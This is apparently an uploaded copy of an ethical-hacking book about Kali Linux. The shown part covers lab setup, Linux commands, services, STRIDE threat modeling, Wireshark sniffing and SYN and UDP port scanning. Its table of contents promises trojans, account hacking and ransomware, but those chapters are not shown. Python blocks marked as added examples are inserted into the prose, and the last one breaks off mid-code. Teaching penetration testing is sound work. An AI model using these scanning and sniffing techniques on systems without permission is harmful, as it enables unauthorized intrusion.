Ethical Hacking With Kali Linux - Made Easy

This document introduces the ethical hacking tool Kali Linux. It discusses how Kali Linux is designed specifically for security professionals to conduct penetration tests and security audits legally and ethically. Some key points about Kali Linux covered include its single non-root user design, disabled network services by default, customized Linux kernel, and collection of over 300 security tools pre-installed. The document also provides an overview of different installation methods for Kali Linux and recommends it as the premier operating system for security professionals to use for tasks like penetration testing and vulnerability assessments.

Uploaded by

kaosflood

Ethical Hacking With KALI Linux

Made Easy

MOHAMAD MAHJOUB
Acknowledgement
This book couldn’t have happened without the involvement of many people.
First and foremost is my wonderful family that is supporting me. My amazing
mom, my brother Tarek, and my brother Ziad. Not to forget my wonderful
friends who are providing me with the emotional support while being away
from my home country. After my family and friends, there is an amazing
team of people who have helped me write this book: Hussein Baghdad, my
online friend whom I have never met to date. He and his ghost team of
designers, proofreaders, and editors are one of the main reasons I’m publishing
this book. I’m truly lucky to have met Hussein; having him on board this
journey had a huge impact in making this book a reality.

This book you are about to read had no prayer of getting in front of you
without the amazing people who have helped me acquire my knowledge
throughout the year. The journey was not easy, but totally worth it from the
learning perspective. To all of these people, I am deeply grateful.

Finally, I dedicate this book to the soul of my late father; I miss you, dad.

Mohamad
September 2020
Contents
INTRODUCTION
The Undeniable Power of Ethical Hacking
SETUP YOUR LAB
Why Kali?
Different Installation Methods
Install KALI
Install Windows (Target machine)
Master KALI desktop environment
SETUP YOUR KALI SERVER
Get Started with Linux Commands
Explore Main Services and Install Necessary Programs
STEPS TO PLAN A SUCCESSFUL PENETRATION TEST
Threat Modeling
9+ WAYS TO ATTACK A NETWORK
Wireshark Simplified
How Does Port Scanning Work?
How Does the UDP Scanning Work?
Introducing NMAP
NMAP and ZENMAP Simplified
Understand NETBIOS and SMB Attacks
Execute Man-in-the-Middle Attacks
Perform a DNS Spoofing Attack
Identify a DNS Zone Transfer Vulnerability
Plan DOS and DDOS Attacks
All-in-one Metasploit Framework
Create Your First Trojan and Infiltrate a Target
Explore the Powerful Armitage Tool
Hide a Payload in a JPEG Image
HOW TO ATTACK MODERN WIRELESS NETWORKS?
Introduction
WPA and WPA2 Cracking
WPS Cracking
4+ WAYS TO ATTACK A WEB APPLICATION
Web Applications Attack Surface
Metasploitable VM
Discover Vulnerabilities in Websites
Control Database Server with SQLMap
Easily Hack a WordPress Site
Intercept, Analyze, and Replay Web Traffic
SIMPLE WAYS TO GAIN ACCESS
Various Password Attacks
Hashing in a Nutshell
Execute an Offline Password Attack on Linux
Execute an Offline Password Attack on Windows
Run an Online Password Attack on Linux
Run an Online Password Attack on a Router
Crack Passwords with Rainbow Tables
Design Effective Wordlists
PROVEN SOCIAL ENGINEERING TECHNIQUES
Attack Vectors
Open-source Intelligence (OSINT)
Google Dorks Live Examples
Collect and Visualize Data with Maltego
Execute a Phishing Attack
Hack Facebook, Twitter, and Gmail Accounts
PERFORM ATTACKS ON MOBILE PHONES
Mobile Attack Surface
Decrypt TLS Sessions
Reverse Engineer an Android Application
Hack an Android Phone and Download its Contacts
MAINTAIN ACCESS
Post-Exploitation Terminologies
Backdoor Tools Explained
Netcat Simplified
Install a Backdoor
Deface a Website in Few Seconds
Understand the Hidden Tear Ransomware
Bypass Firewalls by Tunneling Data and Commands over DNS
SECRET SAUCE BONUS
Wi-Fi Jamming Tool
Create a $3 Rubber Ducky Key-logger
Introduction
The Undeniable Power of Ethical Hacking
An ethical hacker, also referred to as a white hat hacker, is an information
security expert who systematically attempts to penetrate a computer system,
network, application or other computing resources on behalf of its owners,
and with their permission, to find security vulnerabilities that a malicious
hacker could potentially exploit.
The purpose of ethical hacking is to evaluate the security of and identify
vulnerabilities in systems, networks or system infrastructure. It includes
finding and attempting to exploit any vulnerability to determine whether
unauthorized access or other malicious activities are possible.
Ethical hacking entails an ongoing cycle of research and attacks against a
target or a boundary. It is a set of processes and procedures used by
penetration testers in order to circumvent the controls of a certain information
system. These controls can be categorized into technical, administrative and
operational. At the end of the day, the owner will be presented with a
professional report that covers all of these controls and the vulnerabilities found, in
addition to an executive summary of the engagement.
So, what is an ethical hacker?
An ethical hacker is a person who accesses a system on behalf of its
owner after obtaining written consent; it is very important to obtain that
consent. The objective of ethical hacking is to make the world a safer place. It
is a real-world audit that reveals a system's actual security posture.
There are different types of hackers: white-hat hackers, black-hat hackers and
grey-hat hackers.
White-hat hackers are the penetration testers we refer to throughout this
book; we are the good guys. A white-hat hacker accesses a system on behalf
of its owner in order to test it and reveal its security weaknesses. Black-hat
hackers, by contrast, access systems without any consent or permission from
their owner, in order to carry out some hidden agenda.
Grey-hat hackers lie in between: they usually access systems without
permission, but they do not have a hidden agenda; they just do it for their own
benefit.
The name of the game is to identify vulnerabilities in systems that can be
exploited. It is important to note that the skills you will learn should not
be leveraged to break into anything you do not have permission to. It is
completely illegal to access systems for which you do not have explicit, written
permission; we will perform everything on our VMs (virtual machines) or on
systems that you actually own.
Again, I repeat, this is very important. Please do not exercise the skills that
you will learn throughout this book to attack systems you do not own.
As Kali is updated on a daily basis, the GUI and the screenshots in
this book might, for some of the applications, look slightly different from the
ones in the version you are using.

Setup Your Lab


Why Kali?
Kali Linux is specifically geared to meet the requirements of professional
penetration testing and security auditing. To achieve this, several core
changes have been implemented in Kali Linux which reflect these needs:
Single User Access by Design
Due to the nature of security audits, Kali Linux is designed to be used in a
‘single user’ scenario. As of version 2020.1, Offensive Security introduced a
default non-root user named kali. The password is kali as well.
Many of the tools used in penetration testing require escalated privileges.
Throughout this book, you need to prefix commands with sudo and then enter
the password, or you can use the command below to get password-less
privilege escalation:
sudo apt install -y kali-grant-root && sudo dpkg-reconfigure kali-grant-root
Throughout the book, I will be directly using the root account. To do so, you
can use the command sudo su .

After switching with sudo su , the root shell uses a plain, unformatted prompt. To
get the original format back, you need to replace the content of the .bashrc file
with the content of this file on my GitHub repository:
https://github.com/redpython961/kali/blob/master/bashrc.txt
To do so, install leafpad using sudo apt-get install leafpad , open the .bashrc file,
replace its content with the content of the GitHub file, then save the file
and restart the terminal.
root@kali:/home/kali# leafpad ~/.bashrc

Network Services Disabled by Default


Kali Linux contains system hooks that disable network services by default.
These hooks allow us to install various services on Kali Linux, while
ensuring that our distribution remains secure by default, no matter what
packages are installed. Additional services such as Bluetooth are also
blacklisted by default.
Custom Linux Kernel
Kali Linux uses an upstream kernel, patched for wireless injection.
A Minimal and Trusted Set of Repositories
Given the aims and goals of Kali Linux, maintaining the integrity of the
system as a whole is absolutely key. With that goal in mind, the set of
upstream software sources which Kali uses is kept to an absolute minimum.
Many new Kali users are tempted to add additional repositories to their
sources list, but doing so runs a very serious risk of breaking your Kali Linux
installation.
Kali is considered to be the premier operating system for penetration testing,
forensics, security audits and other related uses. Consider it your toolkit for
any kind of security engagement, because it bundles a large number of
security applications in one place, as we are going to see.
Kali is the successor of BackTrack, which used to ship many applications that
performed similar functions; those redundant tools were dropped in Kali. The main
features of Kali are that it is always a free system and a robust solution that
can be updated very easily. It has more than 300 penetration testing tools,
which is really awesome! It supports lots of devices, including
Raspberry Pi microcomputers, Android, etc.
It is completely customizable, with multilingual support. The main tools
that we will explore through this book, just to name a few, are
Metasploit, a post-exploitation tool used for network penetration
testing; NMAP for vulnerability scanning; aircrack-ng to crack into wireless
networks; John the Ripper, a password cracking utility; etc.

Different Installation Methods


There are different installation methods. The first approach is to download an
ISO image from the website, burn it onto a DVD and install it from there.
The second approach is to install Kali Linux on an SD card or a USB
memory stick and boot a live version from there; this is mainly used for
microcomputers such as Raspberry Pi or Orange Pi.
Another approach is to use and boot from PXE environment over the network
and install Kali from there. What we are going to do in this book is to
download a VMware image and import it onto our VMware Workstation
Player.

Install KALI
You need to go to the VMware website and install VMware Workstation
Player from there. It is a free tool if you are using it for personal
purposes, but for commercial use it has an active license
only for a few days. So, feel free to download the player and install it from
the downloads section, or go directly to the following website:
https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html.
You can also use Oracle VirtualBox from
https://www.virtualbox.org/wiki/downloads, which will do the same job.
Once you open VMware Workstation Player for the first time, it will be
empty since there are no virtual machines yet. What you need to do is go to
the www.offensive-security.com website or https://www.kali.org/downloads/ and
download the Kali Linux VMware image from there.
In this case, I will be downloading the 64-bit version. The downloaded image
will be in a compressed form, so you need to extract it, and then go to your
VMware Workstation Player again, press on Open a Virtual Machine link
(see below), navigate to the files extracted, locate the VMX file, and press
open.
As you will notice, the virtual machine name pops up under the home button,
you can directly press on the ‘Play virtual machine’ or you can edit the
virtual machine settings in terms of resources.
Two gigabytes of RAM are enough for the machine to run. Keep the other
default settings and press on the ‘Play’ button.
After some time, the login screen will pop up and you will have to enter the
default username, kali, and the default password, kali. Make sure you
are using the credentials relevant to the release you are using.
After logging on for the first time, the resolution might be incorrect. For this
purpose, you can open the main menu, press on Settings, then select Display
to setup the proper resolution.

Install Windows (Target machine)


After installing the Kali Linux machine, it is time to install the victim’s
machine, a Windows 10 operating system. For this purpose, you need to
navigate to the following web address https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
where you can download a trial version of Windows 10. The license is set to
expire after three months. Select the virtual machine that you want, in our case
Microsoft Edge on Windows 10 (see below), and the platform, which is of
course VMware, then just download the zip file.

Note that the password is Passw0rd!


Extract the files, then go to VMware Workstation Player, press the ‘Open a
Virtual Machine’ button, navigate to the extracted files, select the OVF file
and press ‘Open’. Here you can name the virtual machine; we will name it
Windows 10, and then we can press ‘Import’.
Now you should be able to see the Windows 10 virtual machine
listed. You can edit the virtual machine settings by selecting the image
and going to ‘Edit virtual machine settings’ (see below).

Set the memory for the virtual machine to 2,048 MB, and press ‘OK’. Now
we have the Windows 10 machine up and running and our lab setup is complete.
Master KALI desktop environment
Press on the main menu (see below), to find that there are more than 300
applications used for penetration testing, security auditing, forensics, etc.
These 300 applications are well spread over the categories of information
gathering, vulnerability analysis, web application analysis, database
assessment, password attacks, wireless attacks, reverse engineering, etc. It is
easy to spot an application directly under the category of attacks that you are
planning to do.
The menu item next to the main menu is the File Manager, as in Windows.
You can navigate directories just by double clicking any folder. You have the
option to open a directory as GUI or in the terminal.

Also, you can see the workspace toggle buttons. The concept of workspaces is
important if you are planning to run multiple applications, so that you
can switch between them without disrupting the display.

For example, if we have an open terminal and some other applications, the
terminal will be in workspace one; we can go to workspace two and open other
applications without closing or disrupting the applications already open.
It is a brilliant feature in Kali.
You can also see the wired connection and the wireless connection(s), if
any; virtual machines usually cannot access the host's internal (built-in) wireless
card. You will learn in the wireless section how to set this up. You can also
turn off the machine using the log out button, with the options below.

Feel free to explore the desktop environment and get familiar with it.
Setup Your KALI Server
Get Started with Linux Commands
It is important to learn a couple of Linux commands before continuing with
this book. We are not going to go deep into scripting, but shed the light on
basic Linux commands that will help us jumpstart and continue the rest of the
book.
Many of the applications have graphical interfaces, so we will be able to
make most of our penetration tests within these graphical interfaces. But
learning command line is very powerful and very helpful; I bet you will enjoy
it. Some of the commands we will use are listed below. Remember to use the
sudo command if you are using the default kali account.

passwd
ls
pwd
cd
mkdir & rmdir
locate
man & help
cat
nano
leafpad
grep
less
ifconfig
display

The best practice whenever you log in to any new machine is to change your
current password. The tool provided by Kali is passwd . Type passwd and
follow the prompts: enter the new password, type it again to confirm, and the
new password is set.
The next command is ls , which means list. If you press Enter, it will list
all the directories and files in your current working directory. ls has some
arguments that can help you learn more about the files you are listing,
for example ls -l . If you want to know more about the arguments you
can pass, you can use either the help option or the manual. For the ls program, we
type ls --help and you will see all the help provided with the ls program, all
the arguments and how we can use them; it is pretty
helpful, as you will see.

On top of that, you can use the man command as well. Man means manual:
type man <space> ls , then hit Enter, and it will show you the manual provided
with this command. Some programs provide a manual and others do not;
it depends on the program that you are using.
The next command is cd or Change Directory. If you want to know your
current working directory, you can use the command pwd (Print Working
Directory).
It is important to mention that all these commands in Kali and Linux in
general are case sensitive. So if you write pwd (P uppercase), it will tell you
that the command is not found. So you should write everything in the lower
case as pwd .
We will get our current working directory, which is the root, we can list the
files, we can change using cd command, and we can go to any of the
displayed directories. For example: Music (M in uppercase).
So, if you want to go back to the parent directory, use: cd <space>
<dot><dot> (that is, cd .. ), and you are back one level up. You can also scroll
through the previous commands you used with the up and down
arrows. Even if you close the terminal and open it again, you can still use the
up and down keys for this purpose.
The next command on our list is Make Directory. We use ls
again, then go into the Music folder, for example, and create a directory: mkdir
pop . We type ls again and we see the new directory. I can remove this
directory as well using rmdir (remove directory): rmdir pop , then ls again.

One of the important commands cat , which helps us print the content of the
file to the terminal. For example, if we have a file on the desktop called:
demo.txt, and we want to print the content on the screen, we can use cat ,
then we have to write the name of the file. The content of the file will be
displayed as shown below.

If we want to change the content of the file, we can use another command:
nano <space> the name of the file (demo.txt), then the nano program opens
and we can simply edit the file.
We can add records at the end and then press "control x", it asks us: "Do you
want to save?" we will say "Yes". If you used nano again, you will see the
file updated.
One of the important commands that we will be using throughout this book is
the grep command. grep searches for a string in a file, and this is very
important when we are doing our analysis: sometimes we want to search for a
certain text within a file or within a list of returned values, and this program
will help us a lot. So if I use the same file (demo.txt) and search for the word
“command”, for example, I use grep , the word and the name of the file, and it
returns the lines in which this word appears.

Another command that can help us, especially when we are looking into huge
files, is the less command. So, we can choose a huge file, and we will use
less , and then we will paste the file name and then open it. So, it opens the
file, but not at once, you can sequentially go forward or backward in this file
by using the “Control F” to go forward and “Control B” to go backward.
It fetches the file bit by bit, so you will be able to view it moderately, and if
you want to quit just press Q and you are out of the file.
Another important command to use is the ifconfig , which is similar to the
ipconfig on Windows machines, it displays the current IP that we are using,
as well as the subnet mask and the default gateway.
Another useful command is locate , which is used to find files very
quickly. Before using it, it is recommended to run the updatedb
command, which builds a local database of all the files on the system.
Then you can use the locate command, which consults this
database to determine the location of the file. Suppose that we are searching
for a file called "crontab"; it will return every path in which the file appears.

If you want to clear the screen, just use the clear command, it clears
everything, and you can still use the up and down arrows, to retrieve previous
commands.
The final command to talk about is the uname command, which shows you
the version of Kali you are working on.

Explore Main Services and Install Necessary Programs


The default installation ships with several pre-installed services such as SSH,
HTTP and MySQL. To learn how to enable and disable these services, we
will start with the most commonly used one, SSH, which provides
remote access to computers over a secure protocol that encrypts the data in
transit. To enable the service and start it, use the command below:
sudo service ssh start
To check whether the service is running or not, type the command:
sudo netstat -antp | grep ssh
This tells grep to print only the lines that contain ssh. We
will see that SSH, which runs on port 22, is currently active. To disable
the service, use “stop” instead of “start” and press Enter again. We can use the
same command, sudo netstat -antp | grep ssh , to see that the service is no longer
running.

The next service we will discuss is HTTP, which is mainly used to host
websites. So again, if you want to start the service, the command is:
sudo service apache2 start
And if you want to see if the service is running, we go to the same netstat
command, and instead of SSH, we type apache2 , and you will see the
service apache2 running on port 80.
We can stop the service as well by using “stop” instead of “start”. It is a
pretty straightforward task, just type the name of the service, then “start” or
“stop”.

Now we will learn how to install services that are not available by default in
the distribution, such as FTP. If we type for example:
sudo service vsftpd start
We will get an error, it is actually not installed. So how do we install it?
We use the command:
sudo apt-get install vsftpd
It will take some time to install the service. If we want to run the service as
we did before, use the command:
sudo service vsftpd start
To verify that the service is running, we use the command:
sudo netstat -antp | grep vsftpd
We will see that the FTP service is running on port 21, as shown below.

FTP is insecure by design: it transmits credentials and data in clear text. So let
us uninstall it using the following command:
sudo apt-get remove vsftpd

Starting and stopping services manually each time is not practical.
There is a way to enable these services at boot time. For this purpose we
can use the following command:
sudo update-rc.d ssh enable

This command will enable SSH to start automatically at boot time. We can do
the same for the rest of the services. If you need to disable the service, use
“disable” instead of “enable”.
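The netstat-and-grep check used throughout this chapter answers one question at a time. As an added example that is not from the book, the Python below parses the same `sudo netstat -antp` output and answers the questions a defender wants after enabling services: which programs are listening, which of them are reachable from the network (bound to 0.0.0.0 or ::) rather than local-only, and whether anything is listening that you did not intend to open. The sample output is constructed to resemble a Kali box with ssh, apache2 and a local-only MariaDB; the PIDs and addresses are invented.

```python
# Added example (not from the book): parse `sudo netstat -antp` output and report
# which TCP services are listening, so you can confirm that only the services you
# deliberately started are exposed. SAMPLE_NETSTAT is constructed for the demo.
from __future__ import annotations
import re
from dataclasses import dataclass

SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd: /usr/sbin
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      905/mariadbd
tcp        0      0 192.168.56.10:22        192.168.56.1:51234      ESTABLISHED 1201/sshd: kali [pr
tcp6       0      0 :::80                   :::*                    LISTEN      977/apache2
"""

# proto, recv-q, send-q, local addr:port, foreign addr, LISTEN, pid/program (or "-" without root)
LISTEN_RE = re.compile(
    r"^(tcp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\s+(?:\d+/([^\s:/]+)|-)"
)


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    program: str


def parse_listeners(netstat_output: str) -> list[Listener]:
    """Return one Listener per LISTEN socket; header and established lines are skipped."""
    listeners = []
    for line in netstat_output.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            proto, addr, port, program = m.groups()
            listeners.append(Listener(proto, addr, int(port), program or "unknown"))
    return listeners


def is_listening(netstat_output: str, name: str) -> bool:
    """Same question as `netstat -antp | grep <name>`, restricted to LISTEN sockets."""
    return any(name in l.program for l in parse_listeners(netstat_output))


def exposed_listeners(listeners: list[Listener]) -> list[Listener]:
    """Sockets bound to all interfaces (0.0.0.0 / ::) are reachable from the network;
    127.0.0.1 / ::1 bindings are local-only and far less of a concern."""
    return [l for l in listeners if l.addr in ("0.0.0.0", "::")]


def unexpected_listeners(listeners: list[Listener], allowed_ports: set[int]) -> list[Listener]:
    """Anything listening on a port you did not intend to open."""
    return [l for l in listeners if l.port not in allowed_ports]


if __name__ == "__main__":
    found = parse_listeners(SAMPLE_NETSTAT)
    for l in exposed_listeners(found):
        print(f"{l.program} listening on {l.addr}:{l.port}")
    for l in unexpected_listeners(found, {22, 80}):
        print(f"unexpected: {l.program} on {l.addr}:{l.port}")
```

Run it against real output with `sudo netstat -antp | python3 check_listeners.py`-style piping by reading `sys.stdin` instead of SAMPLE_NETSTAT; without sudo the program column shows `-`, which the regex tolerates but which hides the process name, so run it as root when you want to know what is behind a port.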
Steps to Plan a Successful Penetration
Test
Planning a penetration testing exercise is the name of the game. It always
starts with the reconnaissance phase, and ends with the reporting phase.
Below is the list of some tools and techniques used in each of the phases.

Threat Modeling
Threat modeling is understanding the system we have at hand, whether it is a
mobile application, a web application or even a network, identifying all
the possible threats it could face, and assessing the threat scenarios that might
happen.
In straightforward terms, it is about finding the different ways in which our
system can be attacked, and subsequently designing countermeasures to stop
these attacks. Threat modeling helps us become more proactive and strategic
in our operational and application security. The ultimate goal is to reduce the
attack surface and focus security investment where the business needs it.
It starts with a couple of questions. What are we working on? Here we
have to identify the assets. Then, what can go wrong?
After identifying the assets and attaining the architectural overview of the
system, we ask ourselves several questions: "How can the system be
attacked? What can go wrong?" We need to pin those questions down. After
that: what are we going to do about it? So we start thinking about the
countermeasures and the controls we will have in place, and at the end we
need to assess our job: "Did we do a good job?"

Threat modeling grows out of the basic risk assessment model. We need to
identify threats in the first place; whether it is a process, a piece of software or an
attacker, anything can be a threat. A threat attacks our systems by taking
advantage of the weaknesses or vulnerabilities we have.
The purpose of threat modeling is to close the gaps: to put
controls in place that close those vulnerabilities.

Below are some of the benefits of Threat Modeling:


• Identifying, investigating and rating potential threats and vulnerabilities
• Identifying logical thought processes for defining the system's security
• Creating a set of standard documents that can be used to create
specifications and security testing and prevent future duplication of
security efforts
• Reducing threats and vulnerabilities
• Defining the overall security level of a system or application

Different methods and techniques are used by pen testers, practitioners and
analysts to understand the variety of information security risks. Some of
these structured threat modeling techniques are attack trees, STRIDE,
Elevation of Privilege, T-MAP, Petri nets, data flow diagrams, activity
diagrams and Risk Reduction Overview. One of the most famous models
is STRIDE.
After having the architecture overview, or after simplifying our process or
system and projecting it onto a diagram, we start thinking about what can go
wrong. How does the workflow of this web application or mobile application go?
What do we care about going wrong with this application? Does it handle
financial information? What about the content? Where is the data
stored? And so on.
We spend much of our time analyzing each of the steps in our architectural
overview; one of the simplest techniques that can help us is STRIDE. STRIDE is a
mnemonic for Spoofing, Tampering, Repudiation, Information disclosure,
Denial of service and Elevation of privilege. The technique is used for
identifying threats in these six areas. See the detailed explanation below.
Spoofing identity
    Definition: pretending to be someone else
    Property violated: authentication
    Example: hacking an email account and sending a message under the victim's name

Tampering with data
    Definition: changing data or code
    Property violated: integrity
    Example: changing the source code of an application

Repudiation
    Definition: deniability
    Property violated: non-repudiation
    Example: "No, I did not send this email"

Information disclosure
    Definition: leakage of sensitive information
    Property violated: confidentiality
    Example: PII becoming available on the Internet

Denial of service
    Definition: non-availability of service
    Property violated: availability
    Example: a web application not responding to user requests

Elevation of privilege
    Definition: performing unauthorized actions
    Property violated: authorization
    Example: a normal user is able to delete other accounts

Many mitigation approaches exist, such as using passwords, multifactor
authentication and digital signatures to protect against spoofing attacks. We
can use access control lists and, again, digital signatures to protect against data
tampering. We can use secure logging, auditing and digital signatures to
protect against repudiation. Access control lists can be implemented to
protect against information leakage. Filtering techniques can be employed to
protect against denial of service. To protect against elevation of privilege,
we can implement input validation and access control techniques.
9+ Ways to Attack a Network
Wireshark Simplified
You must have heard of the famous Wireshark network sniffing tool, the
world's leading network traffic analyzer. Wireshark lets you understand
protocols, analyze network traffic in real time, and is often the best tool for
troubleshooting issues on your network.
Wireshark uses the packet capture libraries libpcap on Linux and
winpcap on Windows.
If you have used this tool before, you might have been overwhelmed by
lots of traffic. The secret to using the tool effectively is to use capture and
display filters. So, before demonstrating how Wireshark works, let us go
back to basics and learn how a basic TCP connection is established.
When there is communication between a client and a server, the client
sends a SYN packet, the server replies with a SYN/ACK packet, then
the client confirms with an ACK packet, and at this point the connection is
established.

This is a full TCP connection setup. You might have noticed that the server's
SYN/ACK acknowledges the client's sequence number plus one, and the client's
ACK then acknowledges the server's sequence number plus one.
Similarly, the same routine is followed when terminating a
connection. The client sends the server a FIN packet, the server replies
with a FIN/ACK packet, then the client confirms with an ACK packet and the
connection is terminated.
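The handshake and teardown just described, as an added example that is not from the book: a small Python model of two TCP endpoints that derives the Seq and Ack values you would see in Wireshark for each segment. Host names, initial sequence numbers and the chat message are constructed for the demonstration. It also sends one data segment, which the text does not cover, so you can see that payload bytes advance the numbers in the same way that SYN and FIN each consume one sequence number.

```python
# Added example (not from the book): a minimal model of the TCP three-way handshake,
# one data segment and the teardown, showing where the Seq/Ack numbers in a
# Wireshark capture come from. Names, ISNs and the message are constructed.
from dataclasses import dataclass

FLAG_ORDER = ("SYN", "FIN", "ACK")  # display order, as Wireshark prints them


@dataclass(frozen=True)
class Segment:
    src: str
    dst: str
    seq: int
    ack: int
    flags: frozenset
    payload_len: int = 0


def summarize(seg):
    """One-line summary in the style of Wireshark's Info column."""
    flags = ", ".join(f for f in FLAG_ORDER if f in seg.flags)
    return f"{seg.src} -> {seg.dst} [{flags}] Seq={seg.seq} Ack={seg.ack} Len={seg.payload_len}"


class TcpPeer:
    """Minimal TCP endpoint: tracks snd_nxt/rcv_nxt and the connection state."""

    def __init__(self, name, isn):
        self.name = name
        self.snd_nxt = isn   # next sequence number we will send
        self.rcv_nxt = 0     # next sequence number we expect from the peer (= our Ack)
        self.state = "CLOSED"

    def _send(self, dst, flags, payload_len=0):
        seg = Segment(self.name, dst, self.snd_nxt, self.rcv_nxt, frozenset(flags), payload_len)
        # SYN and FIN each consume one sequence number, as does every payload byte;
        # this is why the peer's Ack comes back as "our sequence number plus one".
        self.snd_nxt += payload_len + ("SYN" in flags) + ("FIN" in flags)
        return seg

    def listen(self):
        self.state = "LISTEN"

    def connect(self, dst):
        self.state = "SYN_SENT"
        return self._send(dst, {"SYN"})

    def send_data(self, dst, data: bytes):
        return self._send(dst, {"ACK"}, len(data))

    def close(self, dst):
        self.state = "FIN_WAIT_1"
        return self._send(dst, {"FIN", "ACK"})

    def receive(self, seg):
        """Consume a segment; return the reply segment, or None if nothing is sent."""
        consumed = seg.payload_len + ("SYN" in seg.flags) + ("FIN" in seg.flags)
        if consumed:
            self.rcv_nxt = seg.seq + consumed   # acknowledge everything received so far
        if self.state == "LISTEN" and seg.flags == {"SYN"}:
            self.state = "SYN_RCVD"
            return self._send(seg.src, {"SYN", "ACK"})
        if self.state == "SYN_SENT" and seg.flags == {"SYN", "ACK"}:
            self.state = "ESTABLISHED"
            return self._send(seg.src, {"ACK"})
        if self.state == "SYN_RCVD" and seg.flags == {"ACK"}:
            self.state = "ESTABLISHED"
            return None
        if self.state == "ESTABLISHED" and "FIN" in seg.flags:
            self.state = "LAST_ACK"             # peer is closing; answer with FIN/ACK
            return self._send(seg.src, {"FIN", "ACK"})
        if self.state == "ESTABLISHED":
            return self._send(seg.src, {"ACK"}) if seg.payload_len else None
        if self.state == "FIN_WAIT_1" and seg.flags == {"FIN", "ACK"}:
            self.state = "TIME_WAIT"
            return self._send(seg.src, {"ACK"})
        if self.state == "LAST_ACK" and seg.flags == {"ACK"}:
            self.state = "CLOSED"
            return None
        raise ValueError(f"{self.name} in {self.state} cannot handle {summarize(seg)}")


def simulate_connection(client_isn=1000, server_isn=5000, message=b"Hello from Kali"):
    """Run handshake, one chat message and teardown; return (trace, client state, server state)."""
    client, server = TcpPeer("kali", client_isn), TcpPeer("windows", server_isn)
    server.listen()
    peers = {client.name: client, server.name: server}
    trace = []

    def deliver(seg):
        # Hand the segment to its destination and keep delivering replies until silence.
        while seg is not None:
            trace.append(seg)
            seg = peers[seg.dst].receive(seg)

    deliver(client.connect(server.name))             # SYN, SYN/ACK, ACK
    deliver(client.send_data(server.name, message))  # data, ACK
    deliver(client.close(server.name))               # FIN/ACK, FIN/ACK, ACK
    return trace, client.state, server.state


if __name__ == "__main__":
    for seg in simulate_connection()[0]:
        print(summarize(seg))
```

Real stacks send the closing FIN with the ACK flag set as well, which is why Wireshark labels both halves of the teardown [FIN, ACK]; the model does the same. Wireshark also shows relative sequence numbers by default (starting at 0), so to compare its output with this model either turn that option off in the TCP protocol preferences or subtract the ISNs yourself.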
To demonstrate this from the Kali machine, we will connect using
Netcat, reuse the previous example of exchanging text messages between the
client and the server, then capture the traffic and analyze it to see what
happened.

To open Wireshark, go to the menu under sniffing and spoofing. First of all, you need to select the interface you want to capture traffic on. You will discover that, by default, Wireshark lists many interfaces, and if you capture all the traffic on all of them you will end up with a huge amount of data.
It is very important to understand the layout of Wireshark, which is divided into three main views. The most important part is the capture engine, which captures traffic according to the capture filters you define; on top you will find the packet display and the display filters. (See below.)

We are only interested in capturing traffic on the wired interface, or the Ethernet interface. Double click on that interface to start capturing packets.
Sniffing has started now. Go to your cloud server or to a Windows virtual machine on your network and open port 2222. From our Kali machine, open a terminal and invoke the following command:
nc -nv <IP address> 2222
We can now establish a connection between the Kali machine and the Windows machine and send and receive text messages, a chat so to speak.
Type “Hello from Kali”, then go to the Windows machine, where the text appears and you can reply; back on Kali, you will find the reply. (As shown below)

So, some activity has taken place between the client and the server. Now go to Wireshark and stop the packet capture. You end up with a small capture, similar to the one shown below. All you need to do is right click on one of the TCP packets and follow the TCP stream, to view the data exchanged between the Kali and Windows machines in clear text.
How Does Port Scanning Work?
Port scanning is the process of checking for open TCP or UDP ports on a remote machine. It is very important that you think of the traffic implications of your scans before you perform any, as they might have effects on the target machines.
We have two methods for scanning a TCP port; the first is called Connect and the second is called SYN/Stealth. The first method is purely based on the three-way TCP handshake mechanism: Connect port scanning attempts to complete a three-way handshake with the target host on the specific port. If the handshake completes, the port is open.
As for the SYN/Stealth scan, it is a TCP port scanning method that involves only sending SYN packets to various ports on the target machine without completing the three-way TCP handshake. If the TCP port is open, a SYN/ACK packet should be sent in return, and this tells us that the port is open without the need to send the final packet to the target machine. It is called stealth because, with early and primitive firewalls, this method opens only half of a three-way handshake connection and often bypassed the firewall's logging; this is no longer the case with modern firewalls, as such scans will be detected.
UDP scanning is different from TCP scanning; as we know, TCP is connection oriented while UDP is stateless, so it has no three-way handshake mechanism. Scanning a UDP port is therefore somewhat different from scanning a TCP port. It is important to get into these details, as understanding these basics will help us a lot throughout this book.

How Does the UDP Scanning Work?
An empty UDP packet is sent to the specific port, and if the UDP port is open we expect no reply from the target machine. But if the UDP port is closed, an ICMP port unreachable packet should be sent back to us. UDP port scanning is somewhat unreliable, as firewalls and routers have the option to drop ICMP packets, which can be misleading. So, people prefer not to scan UDP services and stick to scanning TCP ports.
One of the most popular and robust port scanners to date is the famous Nmap tool. You can literally see complete penetration testing reports that are based entirely on Nmap. It is a great tool and very important to understand, because it will help you a lot in your career. It has numerous features beyond port scanning. The default Nmap TCP scan covers the thousand most popular ports on a given machine. But again, consider the amount of traffic you will be generating: these default thousand ports can generate megabytes of traffic. Now imagine the volume of traffic generated by scanning a full class B network.
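To make two of the ideas above concrete, the handshake bookkeeping behind Wireshark's Follow TCP Stream and the half-open pattern a SYN scan leaves on the wire, here is a small Python flow tracker. It is an added example, not code from the book or from Wireshark or Nmap. The packet records, the third host 192.168.211.131 and the reply text from the Windows side are constructed; the .129 and .130 addresses and port 2222 are the ones used in the lab above.

```python
"""Toy TCP flow tracker: follows the three-way handshake, reassembles a stream the
way Wireshark's Follow TCP Stream does, and flags the half-open pattern a SYN scan
leaves behind.  Added example; every packet below is constructed."""
from collections import defaultdict, namedtuple

# One packet record: endpoints, TCP flags as letters (S, A, R, F, P), seq/ack, payload bytes.
Pkt = namedtuple("Pkt", "src sport dst dport flags seq ack payload")


class FlowTracker:
    def __init__(self):
        # (client_endpoint, server_endpoint) -> flow state; the SYN sender is the client
        self.flows = {}

    def feed(self, p):
        c2s = ((p.src, p.sport), (p.dst, p.dport))
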